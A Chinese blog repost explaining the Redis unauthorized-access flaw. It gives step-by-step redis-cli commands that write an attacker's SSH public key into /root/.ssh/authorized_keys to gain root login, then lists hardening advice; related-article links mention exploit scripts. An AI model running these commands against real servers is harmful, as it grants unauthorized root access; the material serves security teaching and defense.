redis 未授权访问漏洞和防范

简介:
+关注继续查看
  1. 通过nmap扫描开放redis 6379端口

  2. 本机安装redis客户端,能连接远端redis数据库;(redis-cli)

  3. 本机创建私钥和公钥,ssh-keygen -t rsa 一路回车;会在/root/.ssh/下生成私钥文件id_rsa和公钥id_rsa.pub

  4. redis-cli -h 192.168.3.14 链接远程redis数据库

  5. [root@hack bin]# ./redis-cli -h 192.168.3.14

    192.168.3.14:6379> keys *

    1) "xxxx"

    192.168.3.14:6379> config set dir /root/.ssh/

    192.168.3.14:6379> config set dbfilename authorized_keys

    192.168.3.14:6379> set xxxx "\n\n\n 拷贝公钥文件内容(id_rsa.pub)\n\n\n"

    192.168.3.14:6379> save

  6. ssh root@192.168.3.14——发现可以直接登录了;


防范建议:

                redis4.0默认的redis.conf文件把6379默认绑定在127.0.0.1;这里设置允许谁能访问我的redis,不要开放0.0.0.0所有访问;

                redis4.0 的redis.conf里的protected-mode设置成yes;

                对redis启用密码认证 requirepass foobared

                限制ssh登录

                设置redis rename config










本文转自 rm_rf_d 51CTO博客,原文链接:http://blog.51cto.com/12185273/1979133,如需转载请自行联系原作者
相关实践学习
基于Redis实现在线游戏积分排行榜
本场景将介绍如何基于Redis数据库实现在线游戏中的游戏玩家积分排行榜功能。
云数据库 Redis 版使用教程
云数据库Redis版是兼容Redis协议标准的、提供持久化的内存数据库服务,基于高可靠双机热备架构及可无缝扩展的集群架构,满足高读写性能场景及容量需弹性变配的业务需求。 产品详情:https://www.aliyun.com/product/kvstore     ------------------------------------------------------------------------- 阿里云数据库体验:数据库上云实战 开发者云会免费提供一台带自建MySQL的源数据库 ECS 实例和一台目标数据库 RDS实例。跟着指引,您可以一步步实现将ECS自建数据库迁移到目标数据库RDS。 点击下方链接,领取免费ECS&RDS资源,30分钟完成数据库上云实战!https://developer.aliyun.com/adc/scenario/51eefbd1894e42f6bb9acacadd3f9121?spm=a2c6h.13788135.J_3257954370.9.4ba85f24utseFl
目录
相关文章
|
4月前
|
NoSQL 安全 Shell
Redis未授权访问漏洞(自写自动化利用EXP分享)
# 前言: 之前已经有文章写过redis未授权访问的利用总结了,这次主要是py脚本自动化的一个小分享吧。也算是对自己学习的一个记录..
119 0
|
4月前
|
NoSQL 安全 Shell
Redis主从复制漏洞gethsell
在Redis 4.x之后,Redis新增了模块功能,通过外部拓展,可以实现在redis中实现一个新的Redis命令,通过写c语言并编译出.so文件。利用范围:Redis 4.x-Redis 5.x
133 0
|
4月前
|
NoSQL 安全 Shell
Redis未授权访问漏洞的利用总结
Redis 默认情况下,会绑定在 0.0.0.0的6379端口上,如果没有设置相关的策略和安全配置,会将 Redis 服务直接暴露在公网上,在没有设置密码认证的情况下,会导致攻击者可以未授权访问 Redis服务读取、甚至是修改 Redis 的数据
145 0
|
9月前
|
机器学习/深度学习 移动开发 NoSQL
13 redis未授权访问漏洞
未授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面配致其他用户可以无需认证授权真接访问从而引发重票权限可被操作、数据目录等敏感信息泄察
13 redis未授权访问漏洞
|
9月前
|
NoSQL 安全 网络协议
|
运维 NoSQL 算法
对不起,你在网上找的Redis分布式锁都有漏洞
基于 Redis 的分布式锁对大家来说并不陌生,可是你的分布式锁有失败的时候吗?在失败的时候可曾怀疑过你在用的分布式锁真的靠谱吗?以下是结合自己的踩坑经验总结的一些经验之谈。 你真的需要分布式锁吗? 用到分布式锁说明遇到了多个进程共同访问同一个资源的问题。一般是在两个场景下会防止对同一个资源的重复访问: 提高效率。比如多个节点计算同一批任务,如果某个任务已经有节点在计算了,那其他节点就不用重复计算了,以免浪费计算资源。不过重复计算也没事,不会造成其他更大的损失。也就是允许偶尔的失败。 保证正确性。这种情况对锁的要求就很高了,如果重复计算,会对正确性造成影响。这种不允许失败。
170 0
对不起,你在网上找的Redis分布式锁都有漏洞
|
存储 缓存 NoSQL
Redis未授权访问漏洞
利用Redis实现攻击的三种方式
Redis未授权访问漏洞
|
NoSQL 安全 网络安全
Redis未授权访问漏洞的利用及防护
Redis未授权访问漏洞的利用及防护 什么是Redis未授权访问漏洞? Redis在默认情况下,会绑定在0.0.0.0:6379。如果没有采取相关的安全策略,比如添加防火墙规则、避免其他非信任来源IP访问等,这样会使Redis服务完全暴露在公网上。
2939 0
|
机器学习/深度学习 NoSQL Redis
推荐文章
更多